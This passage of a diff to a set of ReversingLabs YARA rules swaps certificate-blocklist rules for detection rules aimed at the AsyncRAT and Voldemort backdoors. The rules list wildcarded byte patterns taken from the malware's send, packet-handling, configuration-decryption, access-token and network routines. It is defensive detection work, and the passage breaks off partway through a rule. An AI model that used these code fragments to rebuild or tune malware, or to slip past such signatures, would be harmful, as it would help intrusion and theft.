+            ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 38 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 3A ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DD
+            ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxiol" and pe.signatures [ i ] . serial == "32:11:99:25:a6:ce:47:10:ae:cc:40:06:c2:8e:74:9f" and 1592438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $run_visual_executor ) and ( $execute_mixed_executor ) and ( $write_connection ) and ( $read_sorter_enumerator )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2C90Eaf4De3Afc03Ba924C719435C2A3 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Asyncrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AsyncRAT backdoor."
 		author = "ReversingLabs"
-		id = "06edc1a3-65b1-5a69-ab6b-4ffc3963513c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "78ff36e1-1620-50f4-8abd-adcf8b1242da"
+		date = "2024-05-22"
+		modified = "2024-05-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4870-L4888"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.AsyncRAT.yara#L1-L149"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5bb78a5e39f9d023cf63edabdc83d4965fc79f6f04f9fea9bcf2a53223fbd4ca"
+		logic_hash = "53a13975cd53b571910f951adc44707c11b86c003eeb7b88dbe701253645ac89"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "AsyncRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$read_server_data_v1 = {
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 28 ??
+            ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0A 06 16 3E ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 06 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 6A 59 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 3A ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6A 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 16 6A 3E ?? ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? ?? ??
+            ?? 69 6F ?? ?? ?? ?? 0B 07 16 3D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 07 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6A 59 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 16 6A 3C ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 30 ??
+            14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 16 6A 28 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 3C ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ??
+            ?? ?? ?? 69 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 38 ?? ??
+            ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD
+        }
+		$send_v1 = {
+            28 ?? ?? ?? ?? 0A 16 0B 06 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DD ??
+            ?? ?? ?? 02 8E 69 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ??
+            ?? ?? 08 16 08 8E 69 6F ?? ?? ?? ?? 02 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ?? 02 73 ??
+            ?? ?? ?? 0D 16 13 ?? 09 16 6A 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 38
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25
+            13 ?? 16 30 ?? DD ?? ?? ?? ?? 09 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ??
+            15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ??
+            06 28 ?? ?? ?? ?? DC
+        }
+		$read_packet_v1_p1 = {
+            73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 02 74 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B
+            07 28 ?? ?? ?? ?? 0C 08 20 4F 01 89 64 42 ?? ?? ?? ?? 08 20 7A 39 BA 13 42 ?? ?? ??
+            ?? 08 20 D4 CA CD 0C 3B ?? ?? ?? ?? 08 20 7A 39 BA 13 3B ?? ?? ?? ?? 38 ?? ?? ?? ??
+            08 20 2B C2 32 1B 3B ?? ?? ?? ?? 08 20 E2 A2 F4 57 3B ?? ?? ?? ?? 08 20 4F 01 89 64
+            3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 08 20 5A 15 79 D9 42 ?? ?? ?? ?? 08 20 B7 16 DB 7A 3B
+            ?? ?? ?? ?? 08 20 39 20 3F B2 3B ?? ?? ?? ?? 08 20 5A 15 79 D9 3B ?? ?? ?? ?? 38 ??
+            ?? ?? ?? 08 20 1E CA D2 DC 3B ?? ?? ?? ?? 08 20 45 FD B6 E0 3B ?? ?? ?? ?? 08 20 D0
+            5E 9B FA 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
+        }
+		$read_packet_v1_p2 = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            16 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 7B ??
+            ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ??
+            06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 ??
+            6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 12 ?? (FE | 16) ?? ?? ??
+            ?? ?? 6F ?? ?? ?? ?? DC 73 ?? ?? ?? ?? 26 06 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ??
+            73 ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 25 3A ?? ?? ?? ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ?? 73
+        }
+		$send_v2 = {
+            7E ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 16 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 39 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 8E
+            B7 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 06 08 16 08 8E B7
+            6F ?? ?? ?? ?? 06 07 16 07 8E B7 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 17 6F ?? ?? ?? ??
+            26 7E ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? B7 16 14 (FE | 06) ?? ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC DE ??
+            25 28 ?? ?? ?? ?? 0D 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C ?? 11 ??
+            28 ?? ?? ?? ?? DC
+        }
+		$open_url_v2 = {
+            03 39 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 20 00 0C 00 00 28 ?? ?? ?? ?? 20 0F 27 00 00 28
+            ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 28 ?? ?? ?? ?? 74 ?? ?? ??
+            ?? 0A 06 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 7E ?? ?? ?? ?? 8E B7 6F ?? ?? ?? ?? 9A 6F ??
+            ?? ?? ?? 06 17 6F ?? ?? ?? ?? 06 20 10 27 00 00 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC
+            2B ?? 02 28 ?? ?? ?? ?? 26
+        }
+		$monitoring_v2 = {
+            73 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ??
+            11 ?? 9A 0B 08 07 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E B7 32 ?? 1F ?? 0A 38 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0D 09 6F ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 2C ?? 2B ?? 08 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 (FE | 07) ?? ?? ?? ?? ??
+            73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 1F ?? 31 ?? 16 0A 72 ?? ?? ?? ?? 09 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 D6 13 ??
+            11 ?? 11 ?? 8E B7 32 ?? 06 17 D6 0A 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 3A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and ( pe.signatures [ i ] . serial == "00:2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" or pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" ) and 1586293430 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $read_server_data_v1 ) and ( $send_v1 ) and ( all of ( $read_packet_v1_p* ) ) ) or ( ( $send_v2 ) and ( $open_url_v2 ) and ( $monitoring_v2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Aff762E907F0644E76Ed8A7485Fb12A1 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Voldemort : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Voldemort backdoor."
 		author = "ReversingLabs"
-		id = "3b3bbbdd-9c2d-5c80-a121-3e3ad13e9ac6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "d770bd79-5141-50a0-8cf7-bca1cf5f23e1"
+		date = "2024-10-09"
+		modified = "2024-10-09"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4890-L4908"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.Voldemort.yara#L1-L208"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ad05389e0eb30cb894b03842d213b8c956f66357a913c73d8d8b79f8336bf980"
+		logic_hash = "1fe2abe17436d2965e34d1f10223af50d9600809fdef234e7d89c74fa33228a9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Voldemort"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$decrypt_configuration_p1 = {
+            4C 8B DC 55 56 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 49
+            89 5B ?? 33 F6 49 89 7B ?? 4D 89 6B ?? 48 89 4C 24 ?? 66 C7 44 24 ?? ?? ?? C6 44 24
+            ?? ?? E8 ?? ?? ?? ?? 4C 8B E8 8B FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B E8 48 85 C0
+            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F
+            84 ?? ?? ?? ?? 45 33 C9 48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
+            CD C7 44 24 ?? ?? ?? ?? ?? 45 8D 41 ?? FF D0 48 89 44 24 ?? 48 8B F8 48 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 33 D2 48 8B CF FF D0 44 8B E0 EB
+            ?? 44 8B E6 89 74 24 ?? FF 15 ?? ?? ?? ?? 45 8B C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ??
+            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 8B F0 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0
+            74 ?? 4C 8D 4C 24 ?? 48 89 74 24 ?? 45 8B C4 49 8B D6 48 8B CF FF D0 8B FE 45 85 E4
+            0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 44 8B C6 48 8D 54 24
+        }
+		$decrypt_configuration_p2 = {
+            0F 1F 84 00 ?? ?? ?? ?? 0F B6 0A 8B C7 FF C7 42 3A 0C 30 0F 85 ?? ?? ?? ?? 41 FF C0
+            48 FF C2 41 83 F8 ?? 72 ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 42 8B 2C 37 4C 89 BC 24 ?? ??
+            ?? ?? 8D 5D ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ??
+            48 8B D8 85 ED 74 ?? 8D 47 ?? 03 C5 41 3B C4 73 ?? 49 8D 56 ?? 44 8B C5 48 03 D7 48
+            8B CB E8 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 66 90 49 FF C0 43
+            38 34 28 75 ?? 85 ED 7E ?? 4C 8B CB 8B C6 4D 8D 49 ?? 99 FF C6 41 F7 F8 48 63 C2 42
+            0F B6 14 28 41 30 51 ?? 3B F5 7C ?? 48 8B 4C 24 ?? 4C 8B C5 48 8B D3 E8 ?? ?? ?? ??
+            48 8B 6C 24 ?? BE ?? ?? ?? ?? EB ?? 41 3B FC 0F 82 ?? ?? ?? ?? 48 8B DE 4C 8B A4 24
+            ?? ?? ?? ?? 4D 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4D 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ??
+            ?? 4C 8B B4 24 ?? ?? ?? ?? 48 85 DB 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C3 33 D2 48 8B C8
+            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
+            D0 48 8B CB E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B CF FF D0 48
+            8B BC 24 ?? ?? ?? ?? 48 85 ED 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C5 33 D2 48 8B C8 FF 15
+            ?? ?? ?? ?? 8B C6 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E 5D
+            C3
+        }
+		$decryption_algorithm = {
+            40 53 48 83 EC ?? 0F B6 01 48 8B D9 84 C0 0F 84 ?? ?? ?? ?? 48 FF C3 48 89 7C 24 ??
+            4C 8B C9 8B F8 3C ?? 72 ?? 83 E7 ?? B9 ?? ?? ?? ?? 0F 1F 00 0F B6 13 48 FF C3 8B C2
+            83 E0 ?? D3 E0 83 C1 ?? 0B F8 80 FA ?? 73 ?? 33 C0 4C 8B C3 4D 2B C1 4C 3B CB 4C 0F
+            47 C0 4D 85 C0 74 ?? 33 D2 49 8B C9 E8 ?? ?? ?? ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ??
+            85 C0 7E ?? 48 89 74 24 ?? 48 8B FB 8B F0 66 90 48 8B D7 E8 ?? ?? ?? ?? 48 83 C7 ??
+            48 83 EE ?? 75 ?? 48 8B 74 24 ?? 48 8B C3 48 8B 7C 24 ?? 48 83 C4 ?? 5B C3 48 8B 7C
+            24 ?? 48 8B C3 48 83 C4 ?? 5B C3
+        }
+		$request_access_token_p1 = {
+            40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
+            33 C4 48 89 84 24 ?? ?? ?? ?? 33 C0 4C 89 4C 24 ?? 33 FF 48 89 44 24 ?? 0F 57 C0 89
+            7C 24 ?? 48 C7 C3 ?? ?? ?? ?? 8B F7 49 8B E8 4C 8B FA 4C 8B F1 48 8B C3 0F 11 44 24
+            ?? 48 FF C0 42 38 34 00 75 ?? 48 8B CB 48 FF C1 40 38 34 0A 75 ?? 48 03 C1 48 8B CB
+            48 FF C1 41 38 34 0E 75 ?? 48 03 C1 4C 8D 24 C5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4D 8B
+            C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 74 ?? 48 89 6C 24 ??
+            4C 8D 05 ?? ?? ?? ?? 4D 8B CE 4C 89 7C 24 ?? 49 8B D4 48 8B C8 E8 ?? ?? ?? ?? 4C 8D
+            0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85 C0 75 ?? 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 8D 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CD FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48
+            8B 6C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CD 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? FF D0
+        }
+		$request_access_token_p2 = {
+            85 C0 0F 84 ?? ?? ?? ?? 49 8B D5 48 8B CD E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ??
+            ?? ?? ?? 48 8B D3 66 90 48 FF C2 40 38 3C 10 75 ?? 48 FF C2 48 8B C8 E8 ?? ?? ?? ??
+            4C 8B F0 48 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85
+            C0 74 ?? 83 78 ?? ?? 75 ?? 48 8B 48 ?? 48 8B FB 80 7C 39 ?? ?? 48 8D 7F ?? 75 ?? FF
+            15 ?? ?? ?? ?? 4C 8D 47 ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 ?? 4C
+            8B C3 48 8B F8 0F 1F 00 49 FF C0 42 80 3C 02 ?? 75 ?? 49 FF C0 48 8B C8 E8 ?? ?? ??
+            ?? 49 8B CE E8 ?? ?? ?? ?? 48 85 FF 74 ?? 80 7C 1F ?? ?? 48 8D 5B ?? 75 ?? 48 8D 53
+            ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B 4C 24 ?? BB ?? ?? ?? ?? 48 89 01 EB ?? 8B 5C 24 ??
+            EB ?? 8B DF EB ?? 8B DE 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 74 ?? FF 15 ?? ?? ??
+            ?? 4D 8B C5 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4C 8B
+            C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C7 33 D2
+            48 8B C8 FF 15 ?? ?? ?? ?? 8B C3 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D 5B C3
+        }
+		$network_communication_p1 = {
+            40 53 56 57 41 54 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24
+            ?? 8B 35 ?? ?? ?? ?? 48 8B F9 48 8D 0D ?? ?? ?? ?? 4D 8B E1 4D 8B F8 4C 8B F2 E8 ??
